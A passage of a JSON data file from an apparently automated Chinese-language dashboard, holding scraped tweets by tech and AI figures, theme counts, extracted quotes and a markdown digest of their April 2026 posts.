"2026-04-23T05:52:02+00:00" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "RT by @Ronald_vanLoon: 12 #AI Terms to Learn\nby @Python_Dv\n\n#ArtificialIntelligence #MachineLearning #ML #MI", + "url": "https://nitter.net/Ronald_vanLoon/status/2047191242535063594#m", + "published_at": "2026-04-23T05:50:01+00:00" + }, + { + "handle": "CryptoCred", + "account": "@CryptoCred", + "name": "Credible Crypto", + "title": "Dev is posting about price", + "url": "https://nitter.net/CryptoCred/status/2047079463750377958#m", + "published_at": "2026-04-22T22:25:51+00:00" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "<3 @infisical", + "url": "https://nitter.net/eladgil/status/2047052737762980083#m", + "published_at": "2026-04-22T20:39:39+00:00" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "Introducing USVC - a single basket of high-growth venture capital, for everyone. \n\nNo accreditation required, SEC-registered, and a very low $500 minimum. \n\nIncludes OpenAI, Anthropic, xAI, Sierra, Crusoe, Legora, and Vercel. As USVC adds more companies, investors will own a piece of that too. \n\nLiquidity typically comes when companies exit, but we’re aiming to let investors redeem up to 5% of the fund every quarter. This isn’t guaranteed, but if we can make it work, you won’t be locked up like in a traditional venture fund.\n\nIt runs on AngelList, which already supports $125 billion of investor capital. \n\nAnd I’ve joined USVC as the Chairman of its Investment Committee.\n—\n\nGo back to the 1500s, you set sail for the new world to find tons of gold - that was adventure capital. \n\nEarly-stage technology is the modern version. It says we are going to create something new, and it’s risky. It’s daring.\n\nBut ordinary people can’t invest until it’s old, until it’s no longer interesting, until everybody has access to it. By the time a stock IPOs, most of the alpha is gone. The adventure is gone. Public market investors are literally last in line.\n\nThis problem has become farcical in the last decade. Startups are reaching trillion dollar valuations in the private markets while ordinary investors have their noses up to the glass, wondering when they’ll be let in.\n\nInvesting in private markets isn’t easy. You need feet on the ground. You need judgment built over years. Most people don’t have the patience to wait ten or twenty years for an investment to come to fruition.\n\nBut there is no more productive, harder-working way to deploy a dollar than in true venture capital.\n\nUSVC enables you to invest in venture capital in a broad, accessible, professionally-managed way, through a single basket of innovation, focused on high-growth startups, at all stages. \n\nIt is how you bet on the future of tech: the smartest young people in the world, working insane hours, leveraged to the max, with code, hardware, capital, media, and community. Your dollar doesn’t work harder anywhere.\n\nThere is an old line - in the future, either you are telling a computer what to do, or a computer is telling you what to do. You don’t want to be on the wrong side of that transaction.\n\nUSVC lets you buy the future, but you buy it now. Then you wait, and if you are right, you get paid.\n\nGet access here:\n\nhttp://usvc.com", + "url": "https://nitter.net/naval/status/2046991137022648800#m", + "published_at": "2026-04-22T16:34:52+00:00" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "Ask Codex about Ulysses attention: wow, you know so much and can help me get this communication+spda thing work!\nAsk Codex to implement a segmented file downloader: didn’t even get the completion block hooked up right.", + "url": "https://nitter.net/liuliu/status/2046986486629986435#m", + "published_at": "2026-04-22T16:16:24+00:00" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "RT by @erikbryn: Thanks for coming in today, and for sharing your feedback on my team’s idea!\n\nYour optimistic take on the value that humans will continue to deliver was so refreshing.", + "url": "https://nitter.net/TejuAdeyinka/status/2046761422148018260#m", + "published_at": "2026-04-22T01:22:04+00:00" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "What a time to be alive", + "url": "https://nitter.net/eladgil/status/2046722094348771758#m", + "published_at": "2026-04-21T22:45:48+00:00" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "RT by @erikbryn: How do AI agents influence knowledge work?\n\n@SuproteemSarkar's (@UChicago) talk at the DEL Seminar Series is now available on YouTube! Moderated by @erikbryn, Sarkar discusses three projects on the Economics of Applied AI.\n\nWatch here: https://youtu.be/4_T4aTLWtwY", + "url": "https://nitter.net/DigEconLab/status/2046698761221783753#m", + "published_at": "2026-04-21T21:13:05+00:00" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "👀", + "url": "https://nitter.net/eladgil/status/2046695194054320150#m", + "published_at": "2026-04-21T20:58:54+00:00" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: My friend @JeffDean encouraged me to speak at this event so come join me on May 26 in San Jose! https://bauplanlabs.github.io/SAO-workshop/", + "url": "https://nitter.net/ceo_clickhouse/status/2046673188193701901#m", + "published_at": "2026-04-21T19:31:28+00:00" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "RT by @erikbryn: Excited to speak at my friend @erikbryn’s ECON 295/CS 323\nclass at @Stanford today. Questions?", + "url": "https://nitter.net/saranormous/status/2046637828025835983#m", + "published_at": "2026-04-21T17:10:57+00:00" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: Following positive feedback from other venues, like STOC and ICML, NeurIPS is pleased to announce a new initiative in partnership with Google: for NeurIPS 2026, authors will have access to Google's Paper Assistant Tool (PAT) to help improve their submissions. \n\nThis program offers authors the opportunity to receive free, automated, and actionable feedback on their manuscripts before the final deadline, private to the authors. It is a completely optional service that is kept strictly private to the authors and will not be used in the review process.\n\nRead more in our blog post: https://blog.neurips.cc/2026/04/21/neurips-supports-authors-with-googles-paper-assistant-tool-pat/", + "url": "https://nitter.net/NeurIPSConf/status/2046632664493384060#m", + "published_at": "2026-04-21T16:50:26+00:00" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "RT by @soumithchintala: Dwarkesh is not an AGI party bro. He's been pretty diverse in how he seeks alpha from across a wide variety of industries. I enjoy the hell out of a lot of his podcasts.\nThis podcast though, his questions and narrative are very AGI Party takes, because I think they're very low-rank. That's my opinion.", + "url": "https://nitter.net/soumithchintala/status/2046282944139215141#m", + "published_at": "2026-04-20T17:40:46+00:00" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "The Jensen + @dwarkesh_sp podcast was fantastic. \nJensen is someone who understood how ecosystems work and someone who understands real-world trade, policy and controls work. And in some deeper sense how AI will actually diffuse into the world.\nIn this podcast, Dwarkesh came off as someone who picked up talking points from an AGI party in the SF Mission District.\nAnd the contrast was so evident.\nAs someone who understood ecosystems relatively deepy, maybe I understood Jensen's take more than others did (idk).\n\nMythos, that Dwarkesh kept bringing up, is not a single absolute turning point in the AI development landscape. Take a state-of-the-art Chinese open-source model, and give it three orders of magnitude more test-time compute + post-training algorithmic advances that haven't been published yet. That's the baseline. It was evident that in whatever bubble Dwarkesh is in, that is seen as a naive or illogical baseline.\n\nWhen AI has such a complex development cycle, it's evident that America needs many levers of policy intervention across multiple layers in a dominant ecosystem that ideally the Western world controls.\n\nThe entire premise that a particular model with AI development will have a critical phase change is neither correct nor does evidence point to it. OpenAI made this point with GPT-4, Anthropic made this point with Mythos, but neither stood / will stand the test of time.\n\nI think Jensen's repeated emphasis within the podcast to try to make this point mostly didn't get Dwarkesh's attention. And Dwarkesh (in this podcast) represents an entire cult of AI researchers and decision-makers that are going to influence policy.\n\nThe thing with policy interventions is that if you do too much too early, you shoot yourself in the foot. There's a good reason American foreign policy and general sanctions of all kinds are measured and continuous.\n\nDespite Jensen's attempt at educating the \"Anthro\" audience how ecosystems work, I'm also not super hopeful a lot of people who've taken the extreme position will change their thought after listening to this podcast. I do think there's a certain religiousness that has permeated some of that community that would make it hard to understand ecosystems at a deeper level.", + "url": "https://nitter.net/soumithchintala/status/2046265830908870983#m", + "published_at": "2026-04-20T16:32:46+00:00" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "Here's a crisp summary by @EconChrisClarke of some of the key findings of our Canaries in the Coal Mine, the counter arguments, the counter-counter arguments and the complementary research by others. @BharatKChandar @RuyuChen", + "url": "https://nitter.net/erikbryn/status/2046244291945927102#m", + "published_at": "2026-04-20T15:07:11+00:00" + } + ], + "top_themes": [ + { + "title": "其他", + "count": 100 + }, + { + "title": "模型能力", + "count": 27 + }, + { + "title": "投融资与并购", + "count": 8 + }, + { + "title": "交易与市场", + "count": 7 + }, + { + "title": "算力与芯片", + "count": 3 + } + ], + "modules": { + "themes": [ + { + "id": "t1", + "title": "其他", + "subtitle": "近30天样本 105 条", + "bullets": [ + "其他相关讨论热度位居前列。" + ] + }, + { + "id": "t2", + "title": "模型能力", + "subtitle": "近30天样本 24 条", + "bullets": [ + "模型能力相关讨论热度位居前列。" + ] + }, + { + "id": "t3", + "title": "交易与市场", + "subtitle": "近30天样本 8 条", + "bullets": [ + "交易与市场相关讨论热度位居前列。" + ] + } + ], + "p0_events": [ + { + "id": "p1", + "title": "yep, that’s what I do. \n\nI am increasingly concerned that pe", + "meta": "@GaryMarcus | 2026-04-27T14:27:36+00:00", + "summary": "yep, that’s what I do. \n\nI am increasingly concerned that people in China are soaking up my wisdom, while a lot of people in the US try to dismiss me.\n\ni don’t think that is going ", + "url": "https://nitter.net/GaryMarcus/status/2048771044987777428#m" + }, + { + "id": "p2", + "title": "#AI Referees the Sand: Real-Time Beach Volleyball Analysis —", + "meta": "@Ronald_vanLoon | 2026-04-27T14:23:11+00:00", + "summary": "#AI Referees the Sand: Real-Time Beach Volleyball Analysis — Enhancing the Game or Changing Its Soul?\nby @measure_plan\n\n#ArtificialIntelligence #MachineLearning #ML", + "url": "https://nitter.net/Ronald_vanLoon/status/2048769934587523460#m" + }, + { + "id": "p3", + "title": "R to @HarryStebbings: Spotify https://open.spotify.com/epis", + "meta": "@HarryStebbings | 2026-04-27T14:02:33+00:00", + "summary": "R to @HarryStebbings: Spotify https://open.spotify.com/episode/5KPihKzCMKY2DnPeuSxXZ5\nApple Podcasts https://podcasts.apple.com/us/podcast/20vc-applovin-%24160bn-market-cap-%245-", + "url": "https://nitter.net/HarryStebbings/status/2048764743205134644#m" + }, + { + "id": "p4", + "title": "Adam Foroughi is by far one of the best CEOs I have ever int", + "meta": "@HarryStebbings | 2026-04-27T14:02:33+00:00", + "summary": "Adam Foroughi is by far one of the best CEOs I have ever interviewed.\n\nCandidly he is insanely stern and cold but also obsessive, focused and utterly brilliant.\n\nWith Adam there is", + "url": "https://nitter.net/HarryStebbings/status/2048764741435179442#m" + }, + { + "id": "p5", + "title": "How poor #Data foundations can undermine #AI success\nby Joan", + "meta": "@Ronald_vanLoon | 2026-04-27T13:45:07+00:00", + "summary": "How poor #Data foundations can undermine #AI success\nby Joanne Carew @CIOonline\n\nLearn more: https://bit.ly/4cGbKSG\n\n#MachineLearning #ArtificialIntelligence #DeepLearning #ML", + "url": "https://nitter.net/Ronald_vanLoon/status/2048760355367604358#m" + }, + { + "id": "p6", + "title": "The video of my conversation with Amin Vahdat, @gilbert, and", + "meta": "@JeffDean | 2026-04-27T13:40:08+00:00", + "summary": "The video of my conversation with Amin Vahdat, @gilbert, and @djrosent at Cloud Next last week is now up. \n\nhttps://youtu.be/BpnJYJmbXcM?si=vUY3hI_aDX8K6gco\n\nThanks for a great con", + "url": "https://nitter.net/JeffDean/status/2048759102390899142#m" + } + ], + "top_quotes": [ + { + "id": "q1", + "quote": "yep, that’s what I do. \n\nI am increasingly concerned that people in China are soaking up my wisdom, while a lot of people in the US try to dismiss me.\n\ni don’t ", + "speaker": "@GaryMarcus", + "date": "2026-04-27T14:27:36+00:00", + "note": "自动抽取", + "url": "https://nitter.net/GaryMarcus/status/2048771044987777428#m" + }, + { + "id": "q2", + "quote": "#AI Referees the Sand: Real-Time Beach Volleyball Analysis — Enhancing the Game or Changing Its Soul?\nby @measure_plan\n\n#ArtificialIntelligence #MachineLearning", + "speaker": "@Ronald_vanLoon", + "date": "2026-04-27T14:23:11+00:00", + "note": "自动抽取", + "url": "https://nitter.net/Ronald_vanLoon/status/2048769934587523460#m" + }, + { + "id": "q3", + "quote": "R to @HarryStebbings: Spotify https://open.spotify.com/episode/5KPihKzCMKY2DnPeuSxXZ5\nApple Podcasts https://podcasts.apple.com/us/podcast/20vc-applovin-%2416", + "speaker": "@HarryStebbings", + "date": "2026-04-27T14:02:33+00:00", + "note": "自动抽取", + "url": "https://nitter.net/HarryStebbings/status/2048764743205134644#m" + } + ], + "category_updates": [ + { + "id": "c1", + "title": "@GaryMarcus", + "subtitle": "活跃推文 10 条", + "level": "P1", + "items": [ + { + "text": "该账号近30天持续活跃,建议重点跟踪。", + "url": "" + } + ] + }, + { + "id": "c2", + "title": "@Ronald_vanLoon", + "subtitle": "活跃推文 10 条", + "level": "P1", + "items": [ + { + "text": "该账号近30天持续活跃,建议重点跟踪。", + "url": "" + } + ] + }, + { + "id": "c3", + "title": "@HarryStebbings", + "subtitle": "活跃推文 10 条", + "level": "P1", + "items": [ + { + "text": "该账号近30天持续活跃,建议重点跟踪。", + "url": "" + } + ] + }, + { + "id": "c4", + "title": "@JeffDean", + "subtitle": "活跃推文 10 条", + "level": "P1", + "items": [ + { + "text": "该账号近30天持续活跃,建议重点跟踪。", + "url": "" + } + ] + } + ], + "risk_signals": [ + { + "id": "r1", + "level": "MID", + "title": "已启用规则兜底", + "detail": "本次 LLM 结构化输出为空,已切换到规则归纳结果。" + }, + { + "id": "llm-fallback-error", + "level": "MID", + "title": "LLM 编排暂不可用", + "detail": "本次使用规则兜底:Expecting property name enclosed in double quotes: line 1 column 1898 (char 1897)" + } + ] + }, + "tweet_summary_md": "# X平台关注列表推文汇总\n\n**生成日期**: 2026-04-27T14:36:21.455665+00:00\n**数据来源**: Nitter RSS 订阅\n**时间范围**: 最近7天\n**账号总数**: 33 | **成功获取**: 17 | **推文总数**: 145\n\n---\n\n### ✅ @sama — Sam Altman(10 条)\n\n**[2026-04-27T13:24:26+00:00]**\n> we have updated our partnership with microsoft. microsoft will remain our primary cloud partner, but we are now able to make our products and services available across all clouds. will continue to pr…\n[原文链接](https://nitter.net/sama/status/2048755148361707946#m)\n\n**[2026-04-27T13:09:30+00:00]**\n> this is so good: https://paulgraham.com/kids.html\n[原文链接](https://nitter.net/sama/status/2048751392031203544#m)\n\n**[2026-04-27T00:05:31+00:00]**\n> so fun to see the reception to 5.5! there is almost nothing that feels more gratifying to me than builders saying they find our tools useful.\n[原文链接](https://nitter.net/sama/status/2048554097985593849#m)\n\n**[2026-04-26T23:59:53+00:00]**\n> Our Principles: Democratization, Empowerment, Universal Prosperity, Resilience, and Adaptability https://openai.com/index/our-principles/\n[原文链接](https://nitter.net/sama/status/2048552677433643427#m)\n\n**[2026-04-26T15:46:41+00:00]**\n> feels like a good time to seriously rethink how operating systems and user interfaces are designed (also the internet; there should be a protocol that is equally usable by people and agents)\n[原文链接](https://nitter.net/sama/status/2048428561481265539#m)\n\n**[2026-04-26T15:37:00+00:00]**\n> \"post-AGI, no one is going to work and the economy is going to collapse\" \"i am switching to polyphasic sleep because GPT-5.5 in codex is so good that i can't afford to be sleeping for such long stret…\n[原文链接](https://nitter.net/sama/status/2048426122854228141#m)\n\n**[2026-04-26T02:15:19+00:00]**\n> RT by @sama: That's exactly my view too, roughly compresses 2 weeks of our previous jobs to 1 day\n[原文链接](https://nitter.net/SebastienBubeck/status/2048224374264885396#m)\n\n**[2026-04-25T22:20:08+00:00]**\n> how can they write code so fast?!\n[原文链接](https://nitter.net/sama/status/2048165186482389253#m)\n\n**[2026-04-25T22:01:18+00:00]**\n> R to @sama: (and we will fix the former)\n[原文链接](https://nitter.net/sama/status/2048160448340767038#m)\n\n**[2026-04-25T22:01:08+00:00]**\n> we still get looksmaxxed on frontend a little but we IQmog hard now\n[原文链接](https://nitter.net/sama/status/2048160404376105179#m)\n\n---\n\n### ✅ @gregbrockman — Greg Brockman(0 条)\n\n---\n\n### ⚠️ @andrejkarpathy — Andrej Karpathy(获取失败)\n\n- 错误: URLError: \n\n### ✅ @ylecun — Yann LeCun(10 条)\n\n**[2026-04-26T18:31:11+00:00]**\n> RT by @ylecun: Republicans have been making this argument my entire life. We had 8 years of Clinton, 8 years of Obama, 4 years of Biden— never became a socialism. But you know what we got? More jobs,…\n[原文链接](https://nitter.net/briantylercohen/status/2048469956627468510#m)\n\n**[2026-04-26T17:27:23+00:00]**\n> RT by @ylecun: Trump just fired all 24 members of the National Science Board. Every single one. By email. No warning. No reason given. The board has existed since 1950. The National Science Board is …\n[原文链接](https://nitter.net/Gianl1974/status/2048453901930660058#m)\n\n**[2026-04-26T16:03:04+00:00]**\n> RT by @ylecun: Existential risk mongers are a small, very vocal cult with a lot of very clever online astroturfing skills. Politicians never waste a good fake crisis, which is why they're perfect for…\n[原文链接](https://nitter.net/Dan_Jeffries1/status/2048432684930654430#m)\n\n**[2026-04-26T13:51:41+00:00]**\n> Shooting oneself in the foot? Nope. Shooting oneself in the prefrontal cortex.\n[原文链接](https://nitter.net/ylecun/status/2048399621492236615#m)\n\n**[2026-04-26T06:48:29+00:00]**\n> RT by @ylecun: Never let critical thinking get in the way of extremist fantasy stories. If you're on either side of this slider, congratulations, you may be a child in an adult costume body! Black an…\n[原文链接](https://nitter.net/Dan_Jeffries1/status/2048293118781296734#m)\n\n**[2026-04-25T19:15:22+00:00]**\n> RT by @ylecun: OPINION: \"Trump’s mismanagement has resulted in death, destruction, wasted tax dollars, and a huge loss in respect for the United States — all to accomplish nothing.\" https://ebx.sh/V5…\n[原文链接](https://nitter.net/PhillyInquirer/status/2048118689258487857#m)\n\n**[2026-04-25T16:01:07+00:00]**\n> RT by @ylecun: When MTV News shut down, it felt like decades of culture vanished overnight 🕳️ But over 470,000 pages were already preserved. That history didn’t disappear. It was archived. 📚 Read VAN…\n[原文链接](https://nitter.net/internetarchive/status/2048069805807128734#m)\n\n**[2026-04-24T14:14:06+00:00]**\n> RT by @ylecun: A mathematician who shared an office with Claude Shannon at Bell Labs gave one lecture in 1986 that explains why some people win Nobel Prizes and other equally smart people spend their…\n[原文链接](https://nitter.net/ihtesham2005/status/2047680485208531152#m)\n\n**[2026-04-24T13:58:49+00:00]**\n> RT by @ylecun: Feel like very few serious people make the argument Britain should develop its own LLM? Certainly not an argument you see made in Westminster often during the sovereignty debate. Also …\n[原文链接](https://nitter.net/Discoplomacy/status/2047676640059154653#m)\n\n**[2026-04-23T23:15:06+00:00]**\n> RT by @ylecun: Trump completely passed out, reawakened, then passed out again during today's pressor in the Oval Office. 😂🤣👇\n[原文链接](https://nitter.net/maddenifico/status/2047454244781818205#m)\n\n---\n\n### ✅ @GaryMarcus — Gary Marcus(10 条)\n\n**[2026-04-27T14:27:36+00:00]**\n> yep, that’s what I do. I am increasingly concerned that people in China are soaking up my wisdom, while a lot of people in the US try to dismiss me. i don’t think that is going to end well.\n[原文链接](https://nitter.net/GaryMarcus/status/2048771044987777428#m)\n\n**[2026-04-27T13:32:43+00:00]**\n> ⚠️ AI agents are wildly premature technology that is being rolled out way too fast. The deepest lesson about the vibe coded AI agent disaster story that is running around is NOT about losing your dat…\n[原文链接](https://nitter.net/GaryMarcus/status/2048757233174122827#m)\n\n**[2026-04-27T12:48:41+00:00]**\n> R to @GaryMarcus: Stop blaming the users. It’s not that simple:\n[原文链接](https://nitter.net/GaryMarcus/status/2048746152749846549#m)\n\n**[2026-04-27T12:36:05+00:00]**\n> People keep blaming the users for the growing number of vibe-coded reasoners. Doing so is *half* right. Users *are*screwing up - by letting vibe coded stuff access their files, without proper backups…\n[原文链接](https://nitter.net/GaryMarcus/status/2048742983684784239#m)\n\n**[2026-04-27T12:20:17+00:00]**\n> “Vibe coded disasters piling up on Reddit”\n[原文链接](https://nitter.net/GaryMarcus/status/2048739005525877072#m)\n\n**[2026-04-27T03:39:49+00:00]**\n> RT by @GaryMarcus: The greatest con of the decade was calling autocomplete “AI”. The second greatest is calling autocomplete-in-a-loop an “agent”.\n[原文链接](https://nitter.net/atmoio/status/2048608025464705084#m)\n\n**[2026-04-27T02:41:14+00:00]**\n> “Always keep a separate backup.” For sure, every experienced programmer should know this. 𝘉𝘶𝘵 𝘸𝘦 𝘫𝘶𝘴𝘵 𝘤𝘳𝘦𝘢𝘵𝘦𝘥 𝘢 𝘸𝘩𝘰𝘭𝘦 𝘨𝘦𝘯𝘦𝘳𝘢𝘵𝘪𝘰𝘯 𝘰𝘧 𝘷𝘪𝘣𝘦 𝘤𝘰𝘥𝘦𝘳𝘴 𝘸𝘩𝘰 𝘥𝘰𝘯’𝘵. And we now have a legion of synthetic coding…\n[原文链接](https://nitter.net/GaryMarcus/status/2048593283639894520#m)\n\n**[2026-04-27T02:25:10+00:00]**\n> RT by @GaryMarcus: “fails less often than a human does” is a terrible metric. We build deterministic software and test it to destruction to ensure it’s 99.99999 reliable . That’s been the basis of ev…\n[原文链接](https://nitter.net/SteveStricklan6/status/2048589239915577837#m)\n\n**[2026-04-27T01:59:04+00:00]**\n> RT by @GaryMarcus: the beauty of a jagged frontier is that every failure is the user's fault and every breakthrough is the model's glory\n[原文链接](https://nitter.net/suchenzang/status/2048582672163995766#m)\n\n**[2026-04-27T01:48:56+00:00]**\n> RT by @GaryMarcus: I mean AI influencers here and everywhere are screaming you shouldn't get hired if you don't use agentic AI because you're deliberatly slowing everyone down and the moment somethin…\n[原文链接](https://nitter.net/BlackHackOfDoom/status/2048580122521780676#m)\n\n---\n\n### ✅ @elonmusk — Elon Musk(10 条)\n\n**[2026-04-27T03:11:45+00:00]**\n> Grok Imagine\n[原文链接](https://nitter.net/elonmusk/status/2048600964102246438#m)\n\n**[2026-04-27T02:26:57+00:00]**\n> Curiosity & adventure are my philosophy https://grok.com/share/bGVnYWN5_d70e0164-cced-4096-99cb-38604067aa7a\n[原文链接](https://nitter.net/elonmusk/status/2048589691054694406#m)\n\n**[2026-04-26T23:22:48+00:00]**\n> Remember this\n[原文链接](https://nitter.net/elonmusk/status/2048543344746250466#m)\n\n**[2026-04-26T22:50:49+00:00]**\n> Grad school indoctrination camps\n[原文链接](https://nitter.net/elonmusk/status/2048535299102265720#m)\n\n**[2026-04-26T21:21:33+00:00]**\n> RT by @elonmusk: 🚨BREAKING: I found Cole Allen's archived tweets. He predicted \"Kamala wins all swing states,\" compared Trump's win to “Nazis getting elected,” and moved to Bluesky. The scary part: h…\n[原文链接](https://nitter.net/KanekoaTheGreat/status/2048512831692452091#m)\n\n**[2026-04-26T17:37:26+00:00]**\n> Accurate\n[原文链接](https://nitter.net/elonmusk/status/2048456433981591867#m)\n\n**[2026-04-26T17:27:34+00:00]**\n> RT by @elonmusk: Falcon 9 launches 25 @Starlink satellites from California\n[原文链接](https://nitter.net/SpaceX/status/2048453949381091634#m)\n\n**[2026-04-26T17:05:40+00:00]**\n> RT by @elonmusk: In shocking news, calling your political opponents Nazis makes crazy people want to kill them. Who could have predicted this?\n[原文链接](https://nitter.net/KonstantinKisin/status/2048448438715445382#m)\n\n**[2026-04-26T16:14:38+00:00]**\n> RT by @elonmusk: 25% of very liberal people say political violence can “sometimes be justified.” Among very conservative people it’s just 3%. In other words, the far left is 8x more likely to support…\n[原文链接](https://nitter.net/RobertMSterling/status/2048435593244237849#m)\n\n**[2026-04-26T13:13:50+00:00]**\n> RT by @elonmusk: How do you think the left redistributes wealth? Violence How do you think the left seizes the means of production? Violence How do you think they censor and surveil opponents? Violen…\n[原文链接](https://nitter.net/TheAliceSmith/status/2048390094529216982#m)\n\n---\n\n### ✅ @paulg — Paul Graham(10 条)\n\n**[2026-04-27T10:01:28+00:00]**\n> One of my favorite pictures. A guy I didn't know took it of us on a street in Palo Alto about 10 years ago.\n[原文链接](https://nitter.net/paulg/status/2048704073356935676#m)\n\n**[2026-04-27T09:50:40+00:00]**\n> You never need to describe something as a \"bad take.\" If it's false or irrelevant or omits something important, you can just say so. And if it's true, relevant, and complete, it's not a bad take.\n[原文链接](https://nitter.net/paulg/status/2048701354672050286#m)\n\n**[2026-04-27T08:17:48+00:00]**\n> Worrying that your startup will be eaten by the model companies is like worrying that your life will be constrained after you become a movie star. You're far more likely simply to fail.\n[原文链接](https://nitter.net/paulg/status/2048677984106664227#m)\n\n**[2026-04-27T04:08:42+00:00]**\n> RT by @paulg: Whenever I go to Paris to talk about investing in YC startups, I'm always amazed how much the French just LOVE Y Combinator. Nous t'aimons aussi, France. My French friend of @Fundoraclu…\n[原文链接](https://nitter.net/jasonfreedman/status/2048615296613937201#m)\n\n**[2026-04-26T14:48:06+00:00]**\n> RT by @paulg: Yeah okay, Lego bros, brodettes and brotheys are cooked with this one. GPT 2 Image can create full Lego sets! With actual Bricklink IDs so you can order the parts and build it. Whole ne…\n[原文链接](https://nitter.net/DennisonBertram/status/2048413815675539816#m)\n\n**[2026-04-26T14:47:09+00:00]**\n> Every post, I block and report a couple accounts using AI-generated replies. It feels much the same as picking up litter on a city street; I don't know if it has any effect, but it feels like I ought…\n[原文链接](https://nitter.net/paulg/status/2048413578789634100#m)\n\n**[2026-04-26T14:40:28+00:00]**\n> Durer was the original Dr Seuss.\n[原文链接](https://nitter.net/paulg/status/2048411898081583547#m)\n\n**[2026-04-26T14:36:59+00:00]**\n> Writing a talk to give in Stockholm. The prospect of speaking to a large group of people is no longer frightening, but writing a talk is as much work as ever. I'm no longer afraid of audiences, but I…\n[原文链接](https://nitter.net/paulg/status/2048411021329453562#m)\n\n**[2026-04-26T13:37:21+00:00]**\n> RT by @paulg: 'Action is now needed': Over 60 ex-U.K. ambassadors call to sanction Israel over West Bank https://www.haaretz.com/west-bank/2026-04-26/ty-article/.premium/over-60-ex-uk-ambassadors-cal…\n[原文链接](https://nitter.net/haaretzcom/status/2048396013816152216#m)\n\n**[2026-04-25T14:17:57+00:00]**\n> RT by @paulg: Journalists worldwide should stand up for colleagues who are murdered.\n[原文链接](https://nitter.net/NickKristof/status/2048043843690561556#m)\n\n---\n\n### ✅ @naval — Naval Ravikant(10 条)\n\n**[2026-04-24T11:53:43+00:00]**\n> RT by @naval: Fundrise VCX is exactly why USVC needs to exist. Retail wants access to OpenAI, Anthropic, SpaceX, xAI, etc. That demand is not going away. VCX turned that demand into a liquid public w…\n[原文链接](https://nitter.net/alexbass/status/2047645157080658335#m)\n\n**[2026-04-24T05:39:10+00:00]**\n> R to @naval: x.com/avlok/status/204754692…\n[原文链接](https://nitter.net/naval/status/2047550896670908809#m)\n\n**[2026-04-24T05:23:22+00:00]**\n> RT by @naval: I’ve seen a lot of questions about USVC, AngelList’s newest product. First, don’t invest in venture capital if you can’t afford to lose your money. Put your savings somewhere safer. But…\n[原文链接](https://nitter.net/avlok/status/2047546920747307466#m)\n\n**[2026-04-24T03:37:14+00:00]**\n> Hari nails it: “Don’t listen to people who don’t know how private markets work.”\n[原文链接](https://nitter.net/naval/status/2047520212787015748#m)\n\n**[2026-04-24T03:33:25+00:00]**\n> R to @naval: x.com/haridigresses/status/2…\n[原文链接](https://nitter.net/naval/status/2047519250433421604#m)\n\n**[2026-04-24T02:58:19+00:00]**\n> R to @naval: x.com/nivi/status/2047471220…\n[原文链接](https://nitter.net/naval/status/2047510419565420779#m)\n\n**[2026-04-24T01:01:28+00:00]**\n> RT by @naval: USVC is a new fund being offered by Naval, it's been discussed widely on X. I have some thoughts and why people should look into it. I have no connection with it and not being paid to s…\n[原文链接](https://nitter.net/Cernovich/status/2047481012826124516#m)\n\n**[2026-04-24T00:22:33+00:00]**\n> RT by @naval: I spent the morning digging into USVC fees. TLDR: In my opinion, there is no lower-cost way to invest in VC other than becoming one. I’m expecting to pay the same or less than it costs …\n[原文链接](https://nitter.net/nivi/status/2047471220451578132#m)\n\n**[2026-04-23T15:20:52+00:00]**\n> RT by @naval: We launched USVC yesterday and it was one of the most fun days of my career Thousands of people ended up subscribing for literally tens of millions of dollars While most of the receptio…\n[原文链接](https://nitter.net/ankurnagpal/status/2047334901033123913#m)\n\n**[2026-04-22T16:34:52+00:00]**\n> Introducing USVC - a single basket of high-growth venture capital, for everyone. No accreditation required, SEC-registered, and a very low $500 minimum. Includes OpenAI, Anthropic, xAI, Sierra, Cruso…\n[原文链接](https://nitter.net/naval/status/2046991137022648800#m)\n\n---\n\n### ✅ @eladgil — Elad Gil(10 条)\n\n**[2026-04-26T02:40:47+00:00]**\n> Saturday song https://youtu.be/D8MoLNxLE98?si=yRsm9viuy3NYvnJ0\n[原文链接](https://nitter.net/eladgil/status/2048230781739581745#m)\n\n**[2026-04-24T18:44:49+00:00]**\n> RT by @eladgil: Adopting Claude speak in my regular life, episode 1: Partner: Did you do the dishes tonight? Me: Yes they're done. Partner: Why are they still dirty? Me: You're right to push back. I …\n[原文链接](https://nitter.net/awnihannun/status/2047748613976264835#m)\n\n**[2026-04-24T01:35:02+00:00]**\n> New life plan- Move to Brooklyn Get neck tat Ride bike everywhere Cold brew own coffee (also start drinking coffee) Adopt 12 year old stray cat, name him Nietzsche Vape mango pods, but ironically Wea…\n[原文链接](https://nitter.net/eladgil/status/2047489459378397604#m)\n\n**[2026-04-23T21:04:47+00:00]**\n> RT by @eladgil: How does one make sense of SF? We are living through the craziest computing revolution of the last 2 decades....and 95% of the value being created is within a 4-mile radius in SF (h/t…\n[原文链接](https://nitter.net/adityaag/status/2047421448449630379#m)\n\n**[2026-04-23T17:55:03+00:00]**\n> Entrepreneurship is a distributed search job across the surface of commercial opportunities\n[原文链接](https://nitter.net/eladgil/status/2047373700643844303#m)\n\n**[2026-04-23T17:20:32+00:00]**\n> Big congrats\n[原文链接](https://nitter.net/eladgil/status/2047365014500389353#m)\n\n**[2026-04-23T17:19:56+00:00]**\n> My view is the AI boom will only accelerate and is a once in a lifetime transformation This is orthogonal to whether many AI companies should exit in next 12-18 months, as some may lack durability 